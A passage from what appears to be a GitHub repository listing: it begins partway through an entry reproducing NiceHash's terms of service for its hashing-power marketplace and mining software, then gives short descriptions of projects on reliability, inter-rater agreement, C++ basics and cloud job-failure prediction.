portion of NiceHash Services, NiceHash Wallet and its related services or any portion thereof if they were disabled due to and activating your NiceHash Account if it has been deactivated due to its inactivity and/or security or other reasons. HASHING POWER TRANSACTIONS General NiceHash may, at any time and in our sole discretion, (i) refuse any order submitted or provided hashing power, (ii) cancel an order or part of the order before it is executed, (iii) impose limits on the order amount permitted or on provided hashing power or (iv) impose any other conditions or restrictions upon your use of the NiceHash Platform and Mining Services without prior notice. For example, but not limited to, NiceHash may limit the number of open orders that you may establish or limit the type of supported Hashing power rigs and mining algorithms or NiceHash may restrict submitting orders or providing hashing power from certain locations. Please refer to the NiceHash Platform, for more information about terminology, hashing power transactions’ definitions and descriptions, order types, order submission, order procedure, order rules and other restrictions and limitations of the hashing power transactions. NiceHash reserves the right to change any transaction, definitions, description, order types, procedure, rules, restrictions and limitations at any time for any reason. Orders, provision of hashing power, payments, deposits, withdrawals and other transactions are accepted only through the interface of the NiceHash Platform, NiceHash API and NiceHash Account and are fixed by the software and hardware tools of the NiceHash Platform. If you do not understand the meaning of any transaction option, NiceHash strongly encourages you not to utilize any of those options. Hashing Power Order In order to submit an Hashing Power Order via the NiceHash Account, the Hashing power buyer must have available funds in his NiceHash Wallet. Hashing power buyer submits a new order to buy hashing power via the NiceHash Platform or via the NiceHash API by setting the following parameters in the order form: NiceHash service server location, third-party mining pool, algorithm to use, order type, set amount he is willing to spend on this order, set price per hash he is willing to pay, optionally approximate limit maximum hashing power for his order and other parameters as requested and by confirming his order. Hashing power buyer may submit an order in maximum amount of funds available on his NiceHash Wallet at the time of order submission. Order run time is only approximate since order’s lifetime is based on the number of hashes that it delivers. Particularly during periods of high volume, illiquidity, fast movement or volatility in the marketplace for any digital assets or hashing power, the actual price per hash at which some of the orders are executed may be different from the prevailing price indicated on NiceHash Platform at the time of your order. You understand that NiceHash is not liable for any such price fluctuations. In the event of market disruption, NiceHash Services disruption, NiceHash Hashing Power Marketplace disruption or manipulation or Force Majeure Event, NiceHash may do one or more of the following: (i) suspend access to the NiceHash Account or NiceHash Platform, or (ii) prevent you from completing any actions in the NiceHash Account, including closing any open orders. Following any such event, when trading resumes, you acknowledge that prevailing market prices may differ significantly from the prices available prior to such event. When Hashing power buyer submits an order for purchasing of the Hashing power via NiceHash Platform or via the NiceHash API he authorizes NiceHash to execute the order on his behalf and for his account in accordance with such order. Hashing power buyer acknowledges and agrees that NiceHash is not acting as his broker, intermediary, agent or advisor or in any fiduciary capacity. NiceHash executes the order in set order amount minus NiceHash’s processing fee. Once the order is successfully submitted the order amount starts to decrease in real time according to the payments for the provided hashing power. Hashing power buyer agrees to pay applicable processing fee to NiceHash for provided services. The NiceHash’s fees are deducted from Hashing power buyer’s NiceHash Wallet once the whole order is exhausted and completed. Please refer to the NiceHash Platform, for more information about the fees which are applicable at the time of provision of services. NiceHash reserves the right to change these fees according to the provisions to change these Terms at any time for any reason. The changed fees will apply only for the NiceHash Services provided after the change of the fees. All orders submitted prior the fee change but not necessary completed prior the fee change will be charged according to the fees applicable at the time of the submission of the order. NiceHash will attempt, on a commercially reasonable basis, to execute the Hashing power buyer’s purchase of the hashing power on the Hashing power marketplace under these Terms according to the best-effort delivery approach. In this respect NiceHash does not guarantee that the hashing power will actually be delivered or verified and does not guarantee any quality of the NiceHash Services. Hashing power buyer may cancel a submitted order during order’s lifetime. If an order has been partially executed, Hashing power buyer may cancel the unexecuted remainder of the order. In this case the NiceHash’s processing fee will apply only for the partially executed order. NiceHash reserves the right to refuse any order cancellation request once the order has been submitted. Selling Hashing Power and the Provision of Hashing Power In order to submit the hashing power to the NiceHash stratum server the Hashing power provider must first point its Hashing power rig to the NiceHash stratum server. Hashing power provider is solely responsible for configuration of his Hashing power rig. The Hashing power provider gets paid by Hashing power buyers for all validated and accepted work that his Hashing power rig has produced. The provided hashing power is validated by NiceHash’s stratum engine and validator. Once the hashing power is validated the Hashing power provider is entitled to receive the payment for his work. NiceHash logs all validated hashing power which was submitted by the Hashing power provider. The Hashing power provider receives the payments of current globally weighted average price on to his NiceHash Wallet or his selected personal Bitcoin address. The payments are made periodically depending on the height of payments. NiceHash reserves the right to hold the payments any time and for any reason by indicating the reason, especially if the payments represent smaller values. Please refer to the NiceHash Platform, for more information about the height of payments for provided hashing power, how the current globally weighted average price is calculated, payment periods, payment conditions and conditions for detention of payments. NiceHash reserves the right to change this payment policy according to the provisions to change these Terms at any time for any reason. All Hashing power rig’s earnings and profitability calculations on NiceHash Platform are only for informational purposes. NiceHash does not warrant that your Hashing power rigs would achieve the same profitability or earnings as calculated on NiceHash Platform. You hereby acknowledge that it is possible that your Hashing power rigs would not be as profitable as indicated in our informational calculations or would not be profitable at all. Hashing power provider agrees to pay applicable processing fee to NiceHash for provided Services. The NiceHash’s fees are deducted from all the payments made to the Hashing power provider for his provided work. Please refer to the NiceHash Platform, for more information about the fees which are applicable at the time of provision of services. Hashing power provider which has not submitted any hashing power to the NiceHash stratum server for a period of 90 days agrees that a processing fee of 0.00001000 BTC or less, depending on the unpaid mining balance, will be deducted from his unpaid mining balance. NiceHash reserves the right to change these fees according to the provisions to change these Terms at any time for any reason. The changed fees will apply only for the NiceHash Services provided after the change of the fees. NiceHash will attempt, on a commercially reasonable basis, to execute the provision of Hashing power providers’ hashing power on the Hashing power marketplace under these Terms according to the best-effort delivery approach. In this respect NiceHash does not guarantee that the hashing power will actually be delivered or verified and does not guarantee any quality of the NiceHash Services. Hashing power provider may disconnect the Hashing power rig from the NiceHash stratum server any time. NiceHash reserves the right to refuse any Hashing power rig once the Hashing power rig has been pointed towards NiceHash stratum server. RESTRICTIONS When accessing the NiceHash Platform or using the Mining Services or NiceHash Wallet, you warrant and agree that you: will not use the Services for any purpose that is unlawful or prohibited by these Terms, will not violate any law, contract, intellectual property or other third-party right or commit a tort, are solely responsible for your conduct while accessing the NiceHash Platform or using the Mining Services or NiceHash Wallet, will not access the NiceHash Platform or use the Mining Services in any manner that could damage, disable, overburden, or impair the provision of the Services or interfere with any other party's use and enjoyment of the Services, will not misuse and/or maliciously use Hashing power rigs, you will particularly refrain from using network botnets or using NiceHash Platform or Mining Services with Hashing power rigs without the knowledge or awareness of Hashing power rig owner(s), will not perform or attempt to perform any kind of malicious attacks on blockchains with the use of the NiceHash Platform or Mining Services, intended to maliciously gain control of more than 50% of the network's mining hash rate, will not use the NiceHash Platform or Mining Services for any kind of market manipulation or disruption, such as but not limited to NiceHash Mining Services disruption and NiceHash Hashing Power Marketplace manipulation. In case of any of the above mentioned events, NiceHash reserves the right to immediately suspend your NiceHash Account, freeze or block the funds in the NiceHash Wallet, and suspend your access to NiceHash Platform, particularly if NiceHash believes that such NiceHash Account are in violation of these Terms or Privacy Policy, or any applicable laws and regulation. RIGHTS AND OBLIGATIONS In the event of disputes with you, NiceHash is obliged to prove that the NiceHash service which is the subject of the dispute was not influenced by technical or other failure. You will have possibility to check at any time, subject to technical availability, the transactions details, statistics and available balance of the funds held on the NiceHash Wallet, through access to the NiceHash Account. You may not obtain or attempt to obtain any materials or information through any means not intentionally made available or provided to you or public through the NiceHash Platform or Mining Services. We may, in our sole discretion, at any time, for any or no reason and without liability to you, with prior notice (i) terminate all rights and obligations between you and NiceHash derived from these Terms, (ii) suspend your access to all or a portion of NiceHash Services, NiceHash Wallet and its related services or any portion thereof and delete or deactivate your NiceHash Account and all related information and files in such account (iii) modify, suspend or discontinue, temporarily or permanently, any portion of NiceHash Platform or (iv) provide enhancements or improvements to the features and functionality of the NiceHash Platform, which may include patches, bug fixes, updates, upgrades and other modifications. Any such change may modify or delete certain portion, features or functionalities of the NiceHash Services. You agree that NiceHash has no obligation to (i) provide any updates, or (ii) continue to provide or enable any particular portion, features or functionalities of the NiceHash Services to you. You further agree that all changes will be (i) deemed to constitute an integral part of the NiceHash Platform, and (ii) subject to these Terms. In the event of your breach of these Terms, including but not limited to, for instance, in the event that you breach any term of these Terms, due to legal grounds originating in anti-money laundering and know your client regulation and procedures, or any other relevant applicable regulation, all right and obligations between you and NiceHash derived from these Terms terminate automatically if you fail to comply with these Terms within the notice period of 8 days after you have been warned by NiceHash about the breach and given 8 days period to cure the breaches. NiceHash reserves the right to keep these rights and obligations in force despite your breach of these Terms. In the event of termination, NiceHash will attempt to return you any funds stored on your NiceHash Wallet not otherwise owed to NiceHash, unless NiceHash believes you have committed fraud, negligence or other misconduct. You acknowledge that the NiceHash Services and NiceHash Wallet may be suspended for maintenance. Technical information about the hashing power transactions, including information about chosen server locations, algorithms used, selected mining pools, your business or activities, including all financial and technical information, specifications, technology together with all details of prices, current transaction performance and future business strategy represent confidential information and trade secrets. NiceHash shall, preserve the confidentiality of all before mentioned information and shall not disclose or cause or permit to be disclosed without your permission any of these information to any person save to the extent that such disclosure is strictly to enable you to perform or comply with any of your obligations under these Terms, or to the extent that there is an irresistible legal requirement on you or NiceHash to do so; or where the information has come into the public domain otherwise than through a breach of any of the terms of these Terms. NiceHash shall not be entitled to make use of any of these confidential information and trade secrets other than during the continuance of and pursuant to these Terms and then only for the purpose of carrying out its obligations pursuant to these Terms. NICEHASH MINER LICENSE (NICEHASH MINING SOFTWARE LICENSE) NiceHash Mining Software whether on disk, in read only memory, or any other media or in any other form is licensed, not sold, to you by NiceHash for use only under these Terms. NiceHash retains ownership of the NiceHash Mining Software itself and reserves all rights not expressly granted to you. Subject to these Terms, you are granted a limited, non-transferable, non-exclusive and a revocable license to download, install and use the NiceHash Mining Software. You may not distribute or make the NiceHash Mining Software available over a network where it could be used by multiple devices at the same time. You may not rent, lease, lend, sell, redistribute, assign, sublicense host, outsource, disclose or otherwise commercially exploit the NiceHash Mining Software or make it available to any third party. There is no license fee for the NiceHash Mining Software. NiceHash reserves the right to change the license fee policy according to the provisions to change these Terms any time and for any reason, including to decide to start charging the license fee for the NiceHash Mining Software. You are responsible for any and all applicable taxes. You may not, and you agree not to or enable others to, copy, decompile, reverse engineer, reverse compile, disassemble, attempt to derive the source code of, decrypt, modify, or create derivative works of the NiceHash Mining Software or any services provided by the NiceHash Mining Software, or any part thereof (except as and only to the extent any foregoing restriction is prohibited by applicable law or to the extent as may be permitted by the licensing terms governing use of open-sourced components included with the NiceHash Mining Software). If you choose to allow automatic updates, your device will periodically check with NiceHash for updates and upgrades to the NiceHash Mining Software and, if an update or upgrade is available, the update or upgrade will automatically download and install onto your device and, if applicable, your peripheral devices. You can turn off the automatic updates altogether at any time by changing the automatic updates settings found within the NiceHash Mining Software. You agree that NiceHash may collect and use technical and related information, including but not limited to technical information about your computer, system and application software, and peripherals, that is gathered periodically to facilitate the provision of software updates, product support and other services to you (if any) related to the NiceHash Mining Software and to verify compliance with these Terms. NiceHash may use this information, as long as it is in a form that does not personally identify you, to improve our NiceHash Services. NiceHash Mining Software contains features that rely upon information about your selected mining pools. You agree to our transmission, collection, maintenance, processing, and use of all information obtained from you about your selected mining pools. You can opt out at any time by going to settings in the NiceHash Mining Software. NiceHash may provide interest-based advertising to you. If you do not want to receive relevant ads in the NiceHash Mining Software, you can opt out at any time by going to settings in the NiceHash Mining Software. If you opt out, you will continue to receive the same number of ads, but they may be less relevant because they will not be based on your interest. NiceHash Mining Software license is effective until terminated. All provisions of these Terms regarding the termination apply also for the NiceHash Mining Software license. Upon the termination of NiceHash Mining Software license, you shall cease all use of the NiceHash Mining Software and destroy or delete all copies, full or partial, of the NiceHash Mining Software. THIRD PARTY MINERS AND PLUGINS Third Party Miners and Plugins are a third party software which enables the best and most efficient mining operations. NiceHash Miner integrates third party mining software using a third party miner plugin system. Third Party Mining Software is a closed source software which supports mining algorithms for cryptocurrencies and can be integrated into NiceHash Mining Software. Third Party Miner Plugin enables the connection between NiceHash Mining Software and Third Party Mining Software and it can be closed, as well as open sourced. NiceHash Mining Software user interface enables the user to manually select which available Third Party Miners and Plugins will be downloaded and integrated. Users can select or deselect Third Party Miners and Plugins found in the Plugin Manager window. Some of the available Third Party Miners and Plugins which are most common are preselected by NiceHash, but can be deselected, depending on users' needs. The details of the Third Party Miners and Plugins available for NiceHash Mining Software are accessible within the NiceHash Mining Software user interface. The details include, but not limited to, the author of the software and applicable license information, if applicable information about developer fee for Third Party Miners, software version etc. Developer fees may apply to the use of Third Party Miners and Plugins. NiceHash will not be liable, to the maximum extent permitted by applicable law, for any damages of any kind, including, but not limited to, direct, consequential, incidental, special or indirect damages, arising out of using Third Party Miners and Plugins. The latter includes, but is not limited to: i) any power outages, maintenance, defects, system failures, mistakes, omissions, errors, defects, viruses, delays in operation or transmission or any failure of performance; ii) any unauthorized access, alteration, deletion, destruction, damage, loss or failure to store any data, including records, private key or other credentials, associated with usage of Third Party Miners and Plugins and ii) Force Majeure Event, communications failure, theft or other interruptions. If you choose to allow automatic updates, your device will periodically check with NiceHash for updates and upgrades to the installed Third Party Miners and Plugins, if an update or upgrade is available, the update or upgrade will automatically download and install onto your device and, if applicable, your peripheral devices. You can turn off the automatic updates altogether at any time by changing the automatic updates settings found within the NiceHash Mining Software. NICEHASH QUICKMINER NiceHash QuickMiner is a software application that allows the visitors of the NiceHash Quick Miner web page, accessible athttps://www.nicehash.com/quick-miner, to connect their PC or a mining rig to the NiceHash Hashing Power Marketplace. Visitors of the NiceHash Quick Miner web page can try out and experience crypto currency mining without having to register on the NiceHash Platform and create a NiceHash Account. Users are encouraged to do so as soon as possible in order to collect the funds earned using NiceHash Quick Miner. Users can download NiceHash QuickMiner free of charge. In order to operate NiceHash QuickMiner software needs to automatically detect technical information about users' computer hardware. You agree that NiceHash may collect and use technical and related information. For more information please refer to NiceHash Privacy Policy. Funds arising from the usage of NiceHash QuickMiner are transferred to a dedicated cryptocurrency wallet owned and managed by NiceHash. NiceHash QuickMiner Users expressly agree and acknowledge that completing the registration process and creating a NiceHash Account is necessary in order to collect the funds arising from the usage of NiceHash QuickMiner. Users of NiceHash QuickMiner who do not successfully register a NiceHash Account will lose their right to claim funds arising from their usage of NiceHash QuickMiner. Those funds, in addition to the condition that the user has not been active on the NiceHash QuickMiner web page for consecutive 7 days, will be donated to the charity of choice. NICEHASH PRIVATE ENDPOINT NiceHash Private Endpoint is a network interface that connects users privately and securely to NiceHash Stratum servers. Private Endpoint uses a private IP address and avoids additional latency caused by DDOS protection. All NiceHash Private Mining Proxy servers are managed by NiceHash and kept up-to-date. Users can request a dedicated private access endpoint by filling in the form for NiceHash Private Endpoint Solution available at the NiceHash Platform. In the form the user specifies the email address, country, number of connections and locations and algorithms used. Based on the request NiceHash prepares an individualized offer based on the pricing stipulated on the NiceHash Platform, available at https://www.nicehash.com/private-endpoint-solution. NiceHash may request additional information from the users of the Private Endpoint Solution in order to determine whether we are obligated to collect VAT from you, including your VAT identification number. INTELLECTUAL PROPERTY NiceHash retains all copyright and other intellectual property rights, including inventions, discoveries, knowhow, processes, marks, methods, compositions, formulae, techniques, information and data, whether or not patentable, copyrightable or protectable in trademark, and any trademarks, copyrights or patents based thereon over all content and other materials contained on NiceHash Platform or provided in connection with the Services, including, without limitation, the NiceHash logo and all designs, text, graphics, pictures, information, data, software, source code, as well as the compilation thereof, sound files, other files and the selection and arrangement thereof. This material is protected by international copyright laws and other intellectual property right laws, namely trademark. These Terms shall not be understood and interpreted in a way that they would mean assignment of copyright or other intellectual property rights, unless it is explicitly defined so in these Terms. NiceHash hereby grants you a limited, nonexclusive and non-sublicensable license to access and use NiceHash’s copyrighted work and other intellectual property for your personal or internal business use. Such license is subject to these Terms and does not permit any resale, the distribution, public performance or public display, modifying or otherwise making any derivative uses, use, publishing, transmission, reverse engineering, participation in the transfer or sale, or any way exploit any of the copyrighted work and other intellectual property other than for their intended purposes. This granted license will automatically terminate if NiceHash suspends or terminates your access to the Services, NiceHash Wallet or closes your NiceHash Account. NiceHash will own exclusive rights, including all intellectual property rights, to any feedback including, but not limited to, suggestions, ideas or other information or materials regarding NiceHash Services or related products that you provide, whether by email, posting through our NiceHash Platform, NiceHash Account or otherwise and you irrevocably assign any and all intellectual property rights on such feedback unlimited in time, scope and territory. Any Feedback you submit is non-confidential and shall become the sole property of NiceHash. NiceHash will be entitled to the unrestricted use, modification or dissemination of such feedback for any purpose, commercial or otherwise, without acknowledgment or compensation to you. You waive any rights you may have to the feedback. We have the right to remove any posting you make on NiceHash Platform if, in our opinion, your post does not comply with the content standards defined by these Terms. PRIVACY POLICY Please refer to our NiceHash Platform and Mining Services Privacy Policy published on the NiceHash Platform for information about how we collect, use and share your information, as well as what options do you have with regards to your personal information. COMMUNICATION AND SUPPORT You agree and consent to receive electronically all communications, agreements, documents, receipts, notices and disclosures that NiceHash provides in connection with your NiceHash Account or use of the NiceHash Platform and Services. You agree that NiceHash may provide these communications to you by posting them via the NiceHash Account or by emailing them to you at the email address you provide. You should maintain copies of electronic communications by printing a paper copy or saving an electronic copy. It is your responsibility to keep your email address updated in the NiceHash Account so that NiceHash can communicate with you electronically. You understand and agree that if NiceHash sends you an electronic communication but you do not receive it because your email address is incorrect, out of date, blocked by your service provider, or you are otherwise unable to receive electronic communications, it will be deemed that you have been provided with the communication. You can update your NiceHash Account preferences at any time by logging into your NiceHash Account. If your email address becomes invalid such that electronic communications sent to you by NiceHash are returned, NiceHash may deem your account to be inactive and close it. You may give NiceHash a notice under these Terms by sending an email to support@nicehash.com or contact NiceHash through support located on the NiceHash Platform. All communication and notices pursuant to these Terms must be given in English language. FEES Please refer to the NiceHash Platform for more information about the fees or administrative costs which are applicable at the time of provision of services. NiceHash reserves the right to change these fees according to the provisions to change these Terms at any time for any reason. The changed fees will apply only for the Services provided after the change of the fees. You authorize us, or our designated payment processor, to charge or deduct your NiceHash Account for any applicable fees in connection with the transactions completed via the Services. TAX It is your responsibility to determine what, if any, taxes apply to the transactions you complete or services you provide via the NiceHash Platform, Mining Services and NiceHash Wallet, it is your responsibility to report and remit the correct tax to the appropriate tax authority and all your factual and potential tax obligations are your concern. You agree that NiceHash is not in any case and under no conditions responsible for determining whether taxes apply to your transactions or services or for collecting, reporting, withholding or remitting any taxes arising from any transactions or services. You also agree that NiceHash is not in any case and under no conditions bound to compensate for your tax obligation or give you any advice related to tax issues. All fees and charges payable by you to NiceHash are exclusive of any taxes, and shall certain taxes be applicable, they shall be added on top of the payable amounts. Upon our request, you will provide to us any information that we reasonably request to determine whether we are obligated to collect VAT from you, including your VAT identification number. If any deduction or withholding is required by law, you will notify NiceHash and will pay NiceHash any additional amounts necessary to ensure that the net amount received by NiceHash, after any deduction and withholding, equals the amount NiceHash would have received if no deduction or withholding had been required. Additionally, you will provide NiceHash with documentation showing that the withheld and deducted amounts have been paid to the relevant taxing authority. FINAL PROVISIONS Natural persons and legal entities that are not capable of holding legal rights and obligations are not allowed to create NiceHash Account and use NiceHash Platform or other related services. If NiceHash becomes aware that such natural person or legal entity has created the NiceHash Account or has used NiceHash Services, NiceHash will delete such NiceHash Account and disable any Services and block access to NiceHash Account and NiceHash Services to such natural person or legal entity. If you register to use the NiceHash Services on behalf of a legal entity, you represent and warrant that (i) such legal entity is duly organized and validly existing under the applicable laws of the jurisdiction of its organization; and (ii) you are duly authorized by such legal entity to act on its behalf. These Terms do not create any third-party beneficiary rights in any individual or entity. These Terms forms the entire agreement and understanding relating to the subject matter hereof and supersede any previous and contemporaneous agreements, arrangements or understandings relating to the subject matter hereof to the exclusion of any terms implied by law that may be excluded by contract. If at any time any provision of these Terms is or becomes illegal, invalid or unenforceable, the legality, validity and enforceability of every other provisions will not in any way be impaired. Such illegal, invalid or unenforceable provision of these Terms shall be deemed to be modified and replaced by such legal, valid and enforceable provision or arrangement, which corresponds as closely as possible to our and your will and business purpose pursued and reflected in these Terms. Headings of sections are for convenience only and shall not be used to limit or construe such sections. No failure to enforce nor delay in enforcing, on our side to the Terms, any right or legal remedy shall function as a waiver thereof, nor shall any individual or partial exercise of any right or legal remedy prevent any further or other enforcement of these rights or legal remedies or the enforcement of any other rights or legal remedies. NiceHash reserves the right to make changes, amendments, supplementations or modifications from time to time to these Terms including but not limited to changes of licence agreement for NiceHash Mining Software and of any fees and compensations policies, in its sole discretion and for any reason. We suggest that you review these Terms periodically for changes. If we make changes to these Terms, we will provide you with notice of such changes, such as by sending an email, providing notice on the NiceHash Platform, placing a popup window after login to the NiceHash Account or by posting the amended Terms on the NiceHash Platform and updating the date at the top of these Terms. The amended Terms will be deemed effective immediately upon posting for any new users of the NiceHash Services. In all other cases, the amended Terms will become effective for preexisting users upon the earlier of either: (i) the date users click or press a button to accept such changes in their NiceHash Account, or (ii) continued use of NiceHash Services 30 days after NiceHash provides notice of such changes. Any amended Terms will apply prospectively to use of the NiceHash Services after such changes become effective. The notice of change of these Terms is considered as notice of termination of all rights and obligations between you and NiceHash derived from these Terms with notice period of 30 days, if you do not accept the amended Terms. If you do not agree to any amended Terms, (i) the agreement between you and NiceHash is terminated by expiry of 30 days period which starts after NiceHash provides you a notice of change of these Terms, (ii) you must discontinue using NiceHash Services and (iii) you must inform us regarding your disagreement with the changes and request closure of your NiceHash Account. If you do not inform us regarding your disagreement and do not request closure of you NiceHash Account, we will deem that you agree with the changed Terms. You may not assign or transfer your rights or obligations under these Terms without the prior written consent of NiceHash. NiceHash may assign or transfer any or all of its rights under these Terms, in whole or in part, without obtaining your consent or approval. These Terms shall be governed by and construed and enforced in accordance with the Laws of the British Virgin Islands, and shall be interpreted in all respects as a British Virgin Islands contract. Any transaction, dispute, controversy, claim or action arising from or related to your access or use of the NiceHash Platform or these Terms of Service likewise shall be governed by the Laws of the British Virgin Islands, exclusive of choice-of-law principles. The rights and remedies conferred on NiceHash by, or pursuant to, these Terms are cumulative and are in addition, and without prejudice, to all other rights and remedies otherwise available to NiceHash at law. NiceHash may transfer its rights and obligations under these Terms to other entities which include, but are not limited to H-BIT, d.o.o. and NICEX Ltd, or any other firm or business entity that directly or indirectly acquires all or substantially all of the assets or business of NICEHASH Ltd. If you do not consent to any transfer, you may terminate this agreement and close your NiceHash Account. These Terms are not boilerplate. If you disagree with any of them, believe that any should not apply to you, or wish to negotiate these Terms, please contact NiceHash and immediately navigate away from the NiceHash Platform. Do not use the NiceHash Mining Services, NiceHash Wallet or other related services until you and NiceHash have agreed upon new terms of service. Last updated: March 1, 2021
Hazrat-Ali9 / University Management Api Gateway Starter🎓 University 🚤 Management 🚎 of a System 🚞 designed to 🚋 seamlessly connect 🚃 and secure 🚚 microservices while ☂maintaining clean 🛼 architecture and 🎳 scalability ⚽ Integrated JWT 🥎 authentication 🏐 role-based 🏈 access control 🎮 and request 🧸 validation Load 📙 balancing rate 🧰 limiting and 🪣 logging middleware better reliability
jorgearanda / Kappa StatsA little Python script to generate Cohen's Kappa and Weighted Kappa measures for inter-rater reliability
vahide-b-84 / FaultTolerantTaskOffloadingSimulationThis project proposes a DRL-based fault-tolerant task offloading method for Mobile Edge-Cloud Computing. Using a DDPG algorithm, it minimizes latency and enhances reliability for delay-sensitive tasks in dynamic environments while adapting to resource fluctuations and failure rates.
sanusanth / C Basic Simple ProgramWhat is C++? C++ is a general-purpose, object-oriented programming language. It was created by Bjarne Stroustrup at Bell Labs circa 1980. C++ is very similar to C (invented by Dennis Ritchie in the early 1970s). C++ is so compatible with C that it will probably compile over 99% of C programs without changing a line of source code. Though C++ is a lot of well-structured and safer language than C as it OOPs based. Some computer languages are written for a specific purpose. Like, Java was initially devised to control toasters and some other electronics. C was developed for programming OS. Pascal was conceptualized to teach proper programming techniques. But C++ is a general-purpose language. It well deserves the widely acknowledged nickname "Swiss Pocket Knife of Languages." C++ is a cross-platform language that can be used to create high-performance applications. C++ was developed by Bjarne Stroustrup, as an extension to the C language. C++ gives programmers a high level of control over system resources and memory. The language was updated 3 major times in 2011, 2014, and 2017 to C++11, C++14, and C++17. About C++ Programming Multi-paradigm Language - C++ supports at least seven different styles of programming. Developers can choose any of the styles. General Purpose Language - You can use C++ to develop games, desktop apps, operating systems, and so on. Speed - Like C programming, the performance of optimized C++ code is exceptional. Object-oriented - C++ allows you to divide complex problems into smaller sets by using objects. Why Learn C++? C++ is used to develop games, desktop apps, operating systems, browsers, and so on because of its performance. After learning C++, it will be much easier to learn other programming languages like Java, Python, etc. C++ helps you to understand the internal architecture of a computer, how computer stores and retrieves information. How to learn C++? C++ tutorial from Programiz - We provide step by step C++ tutorials, examples, and references. Get started with C++. Official C++ documentation - Might be hard to follow and understand for beginners. Visit official C++ documentation. Write a lot of C++ programming code- The only way you can learn programming is by writing a lot of code. Read C++ code- Join Github's open-source projects and read other people's code. C++ best programming language? The answer depends on perspective and requirements. Some tasks can be done in C++, though not very quickly. For example, designing GUI screens for applications. Other languages like Visual Basic, Python have GUI design elements built into them. Therefore, they are better suited for GUI type of task. Some of the scripting languages that provide extra programmability to applications. Such as MS Word and even photoshop tend to be variants of Basic, not C++. C++ is still used widely, and the most famous software have their backbone in C++. This tutorial will help you learn C++ basic and the advanced concepts. Who uses C++? Some of today's most visible used systems have their critical parts written in C++. Examples are Amadeus (airline ticketing) Bloomberg (financial formation), Amazon (Web commerce), Google (Web search) Facebook (social media) Many programming languages depend on C++'s performance and reliability in their implementation. Examples include: Java Virtual Machines JavaScript interpreters (e.g., Google's V8) Browsers (e.g., Internet Explorer, Mozilla's Firefox, Apple's Safari, and Google's Chrome) Application and Web frameworks (e.g., Microsoft's .NET Web services framework). Applications that involve local and wide area networks, user interaction, numeric, graphics, and database access highly depend on C++ language. Why Use C++ C++ is one of the world's most popular programming languages. C++ can be found in today's operating systems, Graphical User Interfaces, and embedded systems. C++ is an object-oriented programming language which gives a clear structure to programs and allows code to be reused, lowering development costs. C++ is portable and can be used to develop applications that can be adapted to multiple platforms. C++ is fun and easy to learn! As C++ is close to C# and Java, it makes it easy for programmers to switch to C++ or vice versa Definition - What does C++ Programming Language mean? C++ is an object oriented computer language created by notable computer scientist Bjorne Stroustrop as part of the evolution of the C family of languages. Some call C++ “C with classes” because it introduces object oriented programming principles, including the use of defined classes, to the C programming language framework. C++ is pronounced "see-plus-plus." C++ Variables Variables are the backbone of any programming language. A variable is merely a way to store some information for later use. We can retrieve this value or data by referring to a "word" that will describe this information. Once declared and defined they may be used many times within the scope in which they were declared. C++ Control Structures When a program runs, the code is read by the compiler line by line (from top to bottom, and for the most part left to right). This is known as "code flow." When the code is being read from top to bottom, it may encounter a point where it needs to make a decision. Based on the decision, the program may jump to a different part of the code. It may even make the compiler re-run a specific piece again, or just skip a bunch of code. You could think of this process like if you were to choose from different courses from Guru99. You decide, click a link and skip a few pages. In the same way, a computer program has a set of strict rules to decide the flow of program execution. C++ Syntax The syntax is a layout of words, expression, and symbols. Well, it's because an email address has its well-defined syntax. You need some combination of letters, numbers, potentially with underscores (_) or periods (.) in between, followed by an at the rate (@) symbol, followed by some website domain (company.com). So, syntax in a programming language is much the same. They are some well-defined set of rules that allow you to create some piece of well-functioning software. But, if you don't abide by the rules of a programming language or syntax, you'll get errors. C++ Tools In the real world, a tool is something (usually a physical object) that helps you to get a certain job done promptly. Well, this holds true with the programming world too. A tool in programming is some piece of software which when used with the code allows you to program faster. There are probably tens of thousands, if not millions of different tools across all the programming languages. Most crucial tool, considered by many, is an IDE, an Integrated Development Environment. An IDE is a software which will make your coding life so much easier. IDEs ensure that your files and folders are organized and give you a nice and clean way to view them. Types of C++ Errors Another way to look at C++ in a practical sense is to start enumerating different kinds of errors that occur as the written code makes its way to final execution. First, there are syntax errors where the code is actually written in an illegible way. This can be a misuse of punctuation, or the misspelling of a function command or anything else that compromises the integrity of the syntax as it is written. Another fundamental type of error is a compiler error that simply tells the programmer the compiler was not able to do its work effectively. As a compiler language, C++ relies on the compiler to make the source code into machine readable code and optimize it in various ways. A third type of error happens after the program has been successfully compiled. Runtime errors are not uncommon in C++ executables. What they represent is some lack of designated resource or non-working command in the executable program. In other words, the syntax is right, and the program was compiled successfully, but as the program is doing its work, it encounters a problem, whether that has to do with interdependencies, operating system requirements or anything else in the general environment in which the program is trying to work. Over time, C++ has remained a very useful language not only in computer programming itself, but in teaching new programmers about how object oriented programming works.
jmgirard / AgreementR package for the tidy calculation of inter-rater reliability
wpjunior / Multi Burn Rate CalculatorCalculator to view detection time using error budget consumption rates, based on lessons from Site Reliability Engineering Workbook
Vu5e / JobFailurePredictionGoogleTraces2019By learning and using prediction for failures, it is one of the important steps to improve the reliability of the cloud computing system. Furthermore, gave the ability to avoid incidents of failure and costs overhead of the system. It created a wonderful opportunity with the breakthroughs of machine learning and cloud storage that utilize generated huge data that provide pathways to predict when the system or hardware malfunction or fails. It can be used to improve the reliability of the system with the help of insights of using statistical analysis on the workload data from the cloud providers. This research will discuss regarding job usage data of tasks on the large “Google Cluster Workload Traces 2019” dataset, using multiple resampling techniques such as “Random Under Sampling, Random Oversampling and Synthetic Minority Oversampling Technique” to handle the imbalanced dataset. Furthermore, using multiple machine learning algorithm which is for traditional machine learning algorithm are “Logistic Regression, Decision Tree Classifier, Random Forest Classifier, Gradient Boosting Classifier and Extreme Gradient Boosting Classifier” while deep learning algorithm using “Long Short-Term Memory (LSTM) and Gated Recurrent Unit (GRU)” for job failure prediction between imbalanced and balanced dataset. Then, to have a comparison of imbalanced and balanced in terms of model accuracy, error rate, sensitivity, f – measure, and precision. The results are Extreme Gradient Boosting Classifier and Gradient Boosting Classifier is the most performing algorithm with and without imbalanced handling techniques. It showcases that SMOTE is the best method to choose from for handling imbalanced data. The deep learning model of LSTM and Gated Recurrent Unit may be not the best for the in terms of accuracy, based on the ROC Curve its better than the XGBoost Classifier and Gradient Boosting Classifier.
